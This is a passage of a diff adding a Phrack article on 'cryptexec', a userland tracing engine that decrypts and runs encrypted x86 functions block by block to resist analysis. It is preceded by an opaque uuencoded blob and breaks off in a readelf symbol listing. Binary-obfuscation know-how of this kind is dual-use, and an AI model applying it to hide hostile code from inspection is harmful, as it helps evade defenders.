+M6OR*.A.EQUKBO:^ST-=;Z!LL](T6>IR%'F^AOV.A)YC&W:E\TI]LH:WYW[/0
+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
+8G>E,9SK3F<YTIC/=;G;_`+2>1G@`T`(`
+`
+end
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack63/13.txt b/phrack63/13.txt
new file mode 100644
index 0000000..90de34c
--- /dev/null
+++ b/phrack63/13.txt
@@ -0,0 +1,1882 @@
+              Volume 0x0b, Issue 0x3f, Phile #0x0d of 0x14
+
+|=------=[ cryptexec: Next-generation runtime binary encryption ]=-------=|
+|=------=[             using on-demand function extraction      ]=-------=|
+|=-----------------------------------------------------------------------=|
+|=----------------=[ Zeljko Vrba <zvrba@globalnet.hr> ]=-----------------=|
+|=-----------------------------------------------------------------------=|
+
+                                ABSTRACT
+
+Please excuse my awkward English, it is not my native language.
+
+    What is binary encryption and why encrypt at all? For the answer to
+this question the reader is referred to the Phrack#58 [1] and article
+therein titled "Runtime binary encryption".  This article describes a
+method to control the target program that doesn't does not rely on
+any assistance from the OS kernel or processor hardware. The method
+is implemented in x86-32 GNU AS (AT&T syntax). Once the controlling
+method is devised, it is relatively trivial to include on-the-fly
+code decryption.
+
+1    Introduction
+2    OS- and hardware-assisted tracing
+3    Userland tracing
+3.1    Provided API
+3.2    High-level description
+3.3    Actual usage example
+3.4    XDE bug
+3.5    Limitations
+3.6    Porting considerations
+4    Further ideas
+5    Related work
+5.1    ELFsh
+5.2    Shiva
+5.3    Burneye
+5.4    Conclusion
+6    References
+7    Credits
+A    Appendix: source code
+A.1    crypt_exec.S
+A.2    cryptfile.c
+A.3    test2.c
+
+Note: Footnotes are marked by # and followed by the number. They are
+listed at the end of each section.
+
+--[ 1.0 - Introduction
+
+    First let me introduce some terminology used in this article so that
+the reader is not confused.
+
+o The attributes "target", "child" and "traced" are used interchangeably
+  (depending on the context) to refer to the program being under the
+  control of another program.
+
+o The attributes "controlling" and "tracing" are used interchangeably to
+  refer to the program that controls the target (debugger, strace, etc.)
+
+
+--[ 2.0 - OS- and hardware-assisted tracing
+
+    Current debuggers (both under Windows and UNIX) use x86 hardware 
+features for debugging. The two most commonly used features are the trace 
+flag (TF) and INT3 instruction, which has a convenient 1-byte encoding of 
+0xCC.
+
+    TF resides in bit 8 of the EFLAGS register and when set to 1 the pro-
+cessor generates exception 1 (debug exception) after each instruction
+is executed. When INT3 is executed, the processor generates exception 3
+(breakpoint).
+
+    The traditional way to trace a program under UNIX is the ptrace(2)
+syscall. The program doing the trace usually does the following
+(shown in pseudocode):
+
+fork()
+child:   ptrace(PT_TRACE_ME)
+           execve("the program to trace")
+parent:  controls the traced program with other ptrace() calls
+
+    Another way is to do ptrace(PT_ATTACH) on an already existing process.
+Other operations that ptrace() interface offers are reading/writing target
+instruction/data memory, reading/writing registers or continuing the
+execution (continually or up to the next system call - this capability is
+used by the well-known strace(1) program).
+
+Each time the traced program receives a signal, the controlling program's
+ptrace() function returns. When the TF is turned on, the traced program
+receives a SIGTRAP after each instruction. The TF is usually not turned
+on by the traced program#1, but from the ptrace(PT_STEP).
+
+    Unlike TF, the controlling program places 0xCC opcode at strategic#2
+places in the code. The first byte of the instruction is replaced with
+0xCC and the controlling program stores both the address and the original
+opcode. When execution comes to that address, SIGTRAP is delivered and
+the controlling program regains control. Then it replaces (again using
+ptrace()) 0xCC with original opcode and single-steps the original
+instruction. After that the original opcode is usually again replaced
+with 0xCC.
+
+Although powerful, ptrace() has several disadvantages:
+
+1. The traced program can be ptrace()d only by one controlling program.
+
+2. The controlling and traced program live in separate address spaces,
+   which makes changing traced memory awkward.
+
+3. ptrace() is a system call:  it is slow  if used for full-blown tracing
+   of larger chunks of code.
+
+    I won't go deeper in the mechanics of ptrace(), there are available
+tutorials [2] and the man page is pretty self-explanatory.
+
+__
+#1 Although nothing prevents it to do so - it is in the user-modifiable
+   portion of EFLAGS.
+#2 Usually the person doing the debugging decides what is strategic.
+
+
+--[ 3.0 - Userland  tracing
+
+    The tracing can be done solely from the user-mode:  the instructions
+are executed natively, except control-transfer instructions (CALL, JMP,
+Jcc, RET, LOOP, JCXZ). The background of this idea is explained
+nicely in [3] on the primitive 1960's MIX computer designed by Knuth.
+
+Features of the method I'm about to describe:
+
+o It allows that only portions of the executable file are encrypted.
+
+o Different portions of the executable can be encrypted with different
+  keys provided there is no cross-calling between them.
+
+o It allows encrypted code to freely call non-encrypted code. In this
+  case the non-encrypted code is also executed instruction by instruction.
+  When called outside of encrypted code, it still executes without
+  tracing.
+
+o There is never more than 24 bytes of encrypted code held in memory in
+  plaintext.
+
+o OS- and language-independent.
+
+    The rest of this section explains the provided API, gives a high-level
+description of the implementation, shows a usage example and discusses
+Here are the details of my own implementation.
+
+
+----[ 3.1 - Provided API
+
+
+    No "official" header file is provided. Because of the sloppy and
+convenient C parameter passing and implicit function declarations, you
+can get away with no declarations whatsoever.
+
+The decryption API consists of one typedef and one function.
+
+typedef (*decrypt_fn_ptr)(void *key, unsigned char *dst, const unsigned
+  char *src);
+
+    This is the generic prototype that your decryption routine must fit. It
+is called from the main decryption routine with the following arguments:
+
+o key: pointer to decryption key data. Note that in most cases this is
+       NOT the raw key but pointer to some kind of "decryption context".
+
+o dst: pointer to destination buffer
+
+o src: pointer to source buffer
+
+    Note that there is no size argument: the block size is fixed to 8 
+bytes. The routine should not read more than 8 bytes from the src and NEVER
+output more than 8 bytes to dst.
+
+    Another unusual constraint is that the decryption function MUST NOT
+modify its arguments on the stack. If you need to do this, copy the stack 
+arguments into local variables. This is a consequence of how the routine 
+is called from within the decryption engine - see the code for details.
+
+    There are no constraints whatsoever on the kind of encryption which can
+be used. ANY bijective function which maps 8 bytes to 8 bytes is suitable.
+Encrypt the code with the function, and use its inverse for the
+decryption. If you use the identity function, then decryption becomes
+simple single-stepping with no hardware support -- see section 4 for
+related work.
+
+The entry point to the decryption engine is the following function:
+
+int crypt_exec(decrypt_fn_ptr dfn, const void *key, const void *lo_addr,
+  const void *hi_addr, const void *F, ...);
+
+    The decryption function has the capability to switch between executing
+both encrypted and plain-text code. The encrypted code can call the 
+plain-text code and plain-text code can return into the encrypted code. 
+But for that to be possible, it needs to know the address bounds of the 
+encrypted code.
+
+    Note that this function is not reentrant! It is not allowed for ANY 
+kind of code (either plain-text or encrypted) running under the crypt_exec
+routine to call crypt_exec again. Things will break BADLY because the
+internal state of previous invocation is statically allocated and will
+get overwritten.
+
+The arguments are as follows:
+
+o dfn: Pointer to decryption function. The function is called with the
+  key argument provided to crypt_exec and the addresses of destination
+  and source buffers.
+
+o key: This are usually NOT the raw key bytes, but the initialized
+  decryption context. See the example code for the test2 program: first
+  the user-provided raw key is loaded into the decryption context and the
+  address of the _context_ is given to the crypt_exec function.
+
+o lo_addr, hi_addr: These are low and high addresses that are encrypted
+  under the same key. This is to facilitate calling non-encrypted code
+  from within encrypted code.
+
+o F: pointer to the code which should be executed under the decryption
+  engine. It can be an ordinary C function pointer. Since the tracing
+  routine was written with 8-byte block ciphers in mind, the F function
+  must be at least 8-byte aligned and its length must be a multiple of 8.
+  This is easier to achieve (even with standard C) than it sounds. See the
+  example below.
+
+o ... become arguments to the called function.
+
+    crypt_exec arranges to function F to be called with the arguments 
+provided in the varargs list. When crypt_exec returns, its return value is
+what the F returned. In short, the call
+
+  x = crypt_exec(dfn, key, lo_addr, hi_addr, F, ...);
+
+has exactly the same semantics as
+
+  x = F(...);
+
+would have, were F plain-text.
+
+    Currently, the code is tailored to use the XDE disassembler. Other
+disassemblers can be used, but the code which accesses results must be
+changed in few places (all references to the disbuf variable).
+
+    The crypt_exec routine provides a private stack of 4kB. If you use your
+own decryption routine and/or disassembler, take care not to consume too
+much stack space. If you want to enlarge the local stack, look for the
+local_stk label in the code.
+
+__
+#3 In the rest of this article I will call this interchangeably tracing
+   or decryption routine. In fact, this is a tracing routine with added
+   decryption.
+
+
+----[ 3.2 - High-level description
+
+
+    The tracing routine maintains two contexts: the traced context and
+its own context. The context consists of 8 32-bit general-purpose
+registers and flags. Other registers are not modified by the routine.
+Both contexts are held on the private stack (that is also used for
+calling C).
+
+    The idea is to fetch, one at a time, instructions from the traced 
+program and execute them natively. Intel instruction set has rather 
+irregular encoding, so the XDE [5] disassembler engine is used to find 
+both the real opcode and total instruction length. During experiments on 
+FreeBSD (which uses LOCK- prefixed MOV instruction in its dynamic loader) 
+I discovered a bug in XDE which is described and fixed below.
+
+    We maintain our own EIP in traced_eip, round it down to the next lower
+8-byte boundary and then decrypt#4 24 bytes#5 into our own buffer.  Then
+the disassembly takes place and the control is  transferred to emulation
+routines via the opcode control table.  All instructions, except control
+transfer, are executed natively (in traced context which is restored at
+appropriate time).  After single instruction execution, the control is
+returned to our tracing routine.
+
+    In order to prevent losing control, the control transfer instructions#6
+are emulated. The big problem was (until I solved it) emulating indirect
+JMP  and  CALL instructions (which can appear with any kind of complex EA
+that i386 supports). The problem is solved by replacing the  CALL/JMP
+instruction with  MOV to register opcode,  and modifying bits 3-5 (reg
+field) of  modR/M byte to set the target register (this field holds the
+part of opcode in the  CALL/JMP case). Then we let the processor to
+calculate the EA for us.
+
+    Of course, a means are needed to stop the encrypted execution and to
+enable encrypted code to call plaintext code:
+
+1. On entering, the tracing engine pops the return address and its
+   private arguments and then pushes the return address back to the
+   traced stack. At that moment:
+     o The stack frame is good for executing a regular C function (F).
+     o The top of stack pointer (esp) is stored into end_esp.
+
+2. When the tracing routine encounters a RET instruction it first checks
+   the traced_esp. If it equals end_esp, it is a point where the F
+   function would have ended. Therefore, we restore the traced context
+   and do not emulate RET, but let it execute natively. This way the
+   tracing routine loses control and normal instruction execution
+   continues.
+
+    In order to allow encrypted code to call plaintext code, there are 
+lo_addr and hi_addr parameters. These parameters determine the low and high
+boundary of encrypted code in memory. If the traced_eip falls out of
+[lo_addr, hi_addr) range, the decryption routine pointer is swapped with
+the pointer to a no-op "decryption" that just copies 8 bytes from source
+to destination. When the traced_eip again falls into that interval, the
+pointers are again swapped.
+
+__
+#4 The decryption routine is called indirectly for reasons described
+   later.
+#5 The number comes from worst-case considerations: if an instruction
+   begins at a boundary that is 7 (mod 8), given maximum instruction
+   length of 15 bytes, yields a total of 22 bytes = 3 blocks. The buffer
+   has 32 bytes in order to accommodate an additional JMP indirect
+   instruction after the traced instruction. The JMP jumps indirectly to
+   place in the tracing routine where execution should continue.
+#6 INT instructions are not considered as control transfer. After (if)
+   the OS returns from the invoked trap, the program execution continues
+   sequentially, the instruction right after INT. So there are no special
+   measures that should be taken.
+
+
+----[ 3.3 - Actual usage example
+
+
+    Given encrypted execution engine, how do we test it? For this purpose I
+have written a small utility named cryptfile that encrypts a portion of
+the executable file ($ is UNIX prompt):
+
+$ gcc -c cast5.c
+$ gcc cryptfile.c cast5.o -o cryptfile
+$ ./cryptfile
+USAGE: ./cryptfile <-e_-d> FILE KEY STARTOFF ENDOFF
+KEY MUST be 32 hex digits (128 bits).
+
+The parameters are as follows:
+
+o -e,-d: one of these is MANDATORY and stands for encryption
+  or decryption.
+
+o FILE: the executable file to be encrypted.
+
+o KEY: the encryption key. It must be given as 32 hex digits.
+
+o STARTOFF, ENDOFF: the starting and ending offset in the file that should
+  be encrypted. They must be a multiple of block size (8 bytes). If not,
+  the file will be correctly encrypted, but the encrypted execution will
+  not work correctly.
+
+    The whole package is tested on a simple program, test2.c. This program
+demonstrates that encrypted functions can call both encrypted and plaintext
+functions as well as return results. It also demonstrates that the engine 
+works even when calling functions in shared libraries.
+
+Now we build the encrypted execution engine:
+
+$ gcc -c crypt_exec.S
+$ cd xde101
+$ gcc -c xde.c
+$ cd ..
+$ ld -r cast5.o crypt_exec.o xde101/xde.o -o crypt_monitor.o
+
+    I'm using patched XDE. The last step is to combine several relocatable
+object files in a single relocatable file for easier linking with other
+programs.
+
+    Then we proceed to build the test program. We must ensure that 
+functions that we want to encrypt are aligned to 8 bytes. I'm specifying 16
+, just in case. Therefore:
+
+$ gcc -falign-functions=16 -g test2.c crypt_monitor.o -o test2
+
+    We want to encrypt functions f1 and f2. How do wemap from function 
+names to offsets in the executable file? Fortunately, this can be simply 
+done for ELF with the readelf utility (that's why I chose such an awkward
+way - I didn't want to bother with yet another ELF 'parser').
+
+$ readelf -s test2
+
+Symbol table '.dynsym' contains 23 entries:
+ Num:     Value   Size Type     Bind    Vis       Ndx Name
+   0: 00000000      0 NOTYPE   LOCAL  DEFAULT   UND
+   1: 08048484     57 FUNC     GLOBAL DEFAULT   UND printf
+   2: 08050aa4      0 OBJECT   GLOBAL DEFAULT   ABS _DYNAMIC
+   3: 08048494      0 FUNC     GLOBAL DEFAULT   UND memcpy
+   4: 08050b98      4 OBJECT   GLOBAL DEFAULT   20 __stderrp
+   5: 08048468      0 FUNC     GLOBAL DEFAULT    8 _init
+   6: 08051c74      4 OBJECT   GLOBAL DEFAULT   20 environ
+   7: 080484a4     52 FUNC     GLOBAL DEFAULT   UND fprintf
+   8: 00000000      0 NOTYPE   WEAK   DEFAULT   UND __deregister_frame..
+   9: 0804fc00      4 OBJECT   GLOBAL DEFAULT   13 __progname
+  10: 080484b4    172 FUNC     GLOBAL DEFAULT   UND sscanf
+  11: 08050b98      0 NOTYPE   GLOBAL DEFAULT   ABS __bss_start
+  12: 080484c4      0 FUNC     GLOBAL DEFAULT   UND memset
+  13: 0804ca64      0 FUNC     GLOBAL DEFAULT   11 _fini
+  14: 080484d4    337 FUNC     GLOBAL DEFAULT   UND atexit
+  15: 080484e4    121 FUNC     GLOBAL DEFAULT   UND scanf
+  16: 08050b98      0 NOTYPE   GLOBAL DEFAULT   ABS _edata
+  17: 08050b68      0 OBJECT   GLOBAL DEFAULT   ABS _GLOBAL_OFFSET_TABLE_
+  18: 08051c78      0 NOTYPE   GLOBAL DEFAULT   ABS _end
+  19: 080484f4    101 FUNC     GLOBAL DEFAULT   UND exit
+  20: 08048504      0 FUNC     GLOBAL DEFAULT   UND strlen
+  21: 00000000      0 NOTYPE   WEAK   DEFAULT   UND _Jv_RegisterClasses
+  22: 00000000      0 NOTYPE   WEAK   DEFAULT   UND __register_frame_info
+
+Symbol table '.symtab' contains 145 entries:
+ Num:     Value   Size Type     Bind    Vis       Ndx Name
+  0: 00000000      0 NOTYPE   LOCAL   DEFAULT   UND
+  1: 080480f4      0 SECTION LOCAL   DEFAULT    1
+  2: 08048110      0 SECTION LOCAL   DEFAULT    2
+  3: 08048128      0 SECTION LOCAL   DEFAULT    3
+  4: 080481d0      0 SECTION LOCAL   DEFAULT    4
+  5: 08048340      0 SECTION LOCAL   DEFAULT    5
+  6: 08048418      0 SECTION LOCAL   DEFAULT    6
+  7: 08048420      0 SECTION LOCAL   DEFAULT    7
+  8: 08048468      0 SECTION LOCAL   DEFAULT    8
+  9: 08048474      0 SECTION LOCAL   DEFAULT    9
+ 10: 08048520      0 SECTION LOCAL   DEFAULT   10
+ 11: 0804ca64      0 SECTION LOCAL   DEFAULT   11
+ 12: 0804ca80      0 SECTION LOCAL   DEFAULT   12
+ 13: 0804fc00      0 SECTION LOCAL   DEFAULT   13
+ 14: 08050aa0      0 SECTION LOCAL   DEFAULT   14
+ 15: 08050aa4      0 SECTION LOCAL   DEFAULT   15
+ 16: 08050b54      0 SECTION LOCAL   DEFAULT   16
+ 17: 08050b5c      0 SECTION LOCAL   DEFAULT   17
+ 18: 08050b64      0 SECTION LOCAL   DEFAULT   18
+ 19: 08050b68      0 SECTION LOCAL   DEFAULT   19
+ 20: 08050b98      0 SECTION LOCAL   DEFAULT   20
+ 21: 00000000      0 SECTION LOCAL   DEFAULT   21
+ 22: 00000000      0 SECTION LOCAL   DEFAULT   22
+ 23: 00000000      0 SECTION LOCAL   DEFAULT   23
+ 24: 00000000      0 SECTION LOCAL   DEFAULT   24
+ 25: 00000000      0 SECTION LOCAL   DEFAULT   25
+ 26: 00000000      0 SECTION LOCAL   DEFAULT   26
+ 27: 00000000      0 SECTION LOCAL   DEFAULT   27
+ 28: 00000000      0 SECTION LOCAL   DEFAULT   28
+ 29: 00000000      0 SECTION LOCAL   DEFAULT   29
+ 30: 00000000      0 SECTION LOCAL   DEFAULT   30
+ 31: 00000000      0 SECTION LOCAL   DEFAULT   31
+ 32: 00000000      0 FILE    LOCAL   DEFAULT   ABS crtstuff.c
+ 33: 08050b54      0 OBJECT  LOCAL   DEFAULT   16 __CTOR_LIST__
+ 34: 08050b5c      0 OBJECT  LOCAL   DEFAULT   17 __DTOR_LIST__
+ 35: 08050aa0      0 OBJECT  LOCAL   DEFAULT   14 __EH_FRAME_BEGIN__
+ 36: 08050b64      0 OBJECT  LOCAL   DEFAULT   18 __JCR_LIST__
+ 37: 0804fc08      0 OBJECT  LOCAL   DEFAULT   13 p.0
+ 38: 08050b9c      1 OBJECT  LOCAL   DEFAULT   20 completed.1
+ 39: 080485b0      0 FUNC    LOCAL   DEFAULT   10 __do_global_dtors_aux
+ 40: 08050ba0     24 OBJECT  LOCAL   DEFAULT   20 object.2
+ 41: 08048610      0 FUNC    LOCAL   DEFAULT   10 frame_dummy
+ 42: 00000000      0 FILE    LOCAL   DEFAULT   ABS crtstuff.c
+ 43: 08050b58      0 OBJECT  LOCAL   DEFAULT   16 __CTOR_END__
+ 44: 08050b60      0 OBJECT  LOCAL   DEFAULT   17 __DTOR_END__
+ 45: 08050aa0      0 OBJECT  LOCAL   DEFAULT   14 __FRAME_END__
+ 46: 08050b64      0 OBJECT  LOCAL   DEFAULT   18 __JCR_END__
+ 47: 0804ca30      0 FUNC    LOCAL   DEFAULT   10 __do_global_ctors_aux
+ 48: 00000000      0 FILE    LOCAL   DEFAULT   ABS test2.c
+ 49: 08048660     75 FUNC    LOCAL   DEFAULT   10 f1
+ 50: 080486b0     58 FUNC    LOCAL   DEFAULT   10 f2
+ 51: 08050bb8     16 OBJECT  LOCAL   DEFAULT   20 key.0
+ 52: 080486f0    197 FUNC    LOCAL   DEFAULT   10 decode_hex_key
+ 53: 00000000      0 FILE    LOCAL   DEFAULT   ABS cast5.c
+ 54: 0804cba0   1024 OBJECT  LOCAL   DEFAULT   12 s1
+ 55: 0804cfa0   1024 OBJECT  LOCAL   DEFAULT   12 s2
+ 56: 0804d3a0   1024 OBJECT  LOCAL   DEFAULT   12 s3
+ 57: 0804d7a0   1024 OBJECT  LOCAL   DEFAULT   12 s4
+ 58: 0804dba0   1024 OBJECT  LOCAL   DEFAULT   12 s5
+ 59: 0804dfa0   1024 OBJECT  LOCALDEFAULT   12 s6
+ 60: 0804e3a0   1024 OBJECT  LOCAL   DEFAULT   12 s7
+ 61: 0804e7a0   1024 OBJECT  LOCAL   DEFAULT   12 sb8
+ 62: 0804a3c0   3734 FUNC    LOCAL   DEFAULT   10 key_schedule
+ 63: 0804b408      0 NOTYPE  LOCAL   DEFAULT   10 identity_decrypt
+ 64: 08051bf0      0 NOTYPE  LOCAL   DEFAULT   20 r_decrypt
+ 65: 08051be8      0 NOTYPE  LOCAL   DEFAULT   20 key
+ 66: 08050bd4      0 NOTYPE  LOCAL   DEFAULT   20 lo_addr
+ 67: 08050bd8      0 NOTYPE  LOCAL   DEFAULT   20 hi_addr
+ 68: 08050bcc      0 NOTYPE  LOCAL   DEFAULT   20 traced_eip
+ 69: 08050be0      0 NOTYPE  LOCAL   DEFAULT   20 end_esp
+ 70: 08050bd0      0 NOTYPE  LOCAL   DEFAULT   20 traced_ctr
+ 71: 0804b449      0 NOTYPE  LOCAL   DEFAULT   10 decryptloop
+ 72: 08050bc8      0 NOTYPE  LOCAL   DEFAULT   20 traced_esp
+ 73: 08051be4      0 NOTYPE  LOCAL   DEFAULT   20 stk_end
+ 74: 0804b456      0 NOTYPE  LOCAL   DEFAULT   10 decryptloop_nocontext
+ 75: 0804b476      0 NOTYPE  LOCAL   DEFAULT   10 .store_decrypt_ptr
+ 76: 08051bec      0 NOTYPE  LOCAL   DEFAULT   20 decrypt
+ 77: 0804fc35      0 NOTYPE  LOCAL   DEFAULT   13 insn
+ 78: 08051bf4      0 NOTYPE  LOCAL   DEFAULT   20 disbuf
+ 79: 08051be4      0 NOTYPE  LOCAL   DEFAULT   20 ilen
+ 80: 080501f0      0 NOTYPE  LOCAL   DEFAULT   13 continue
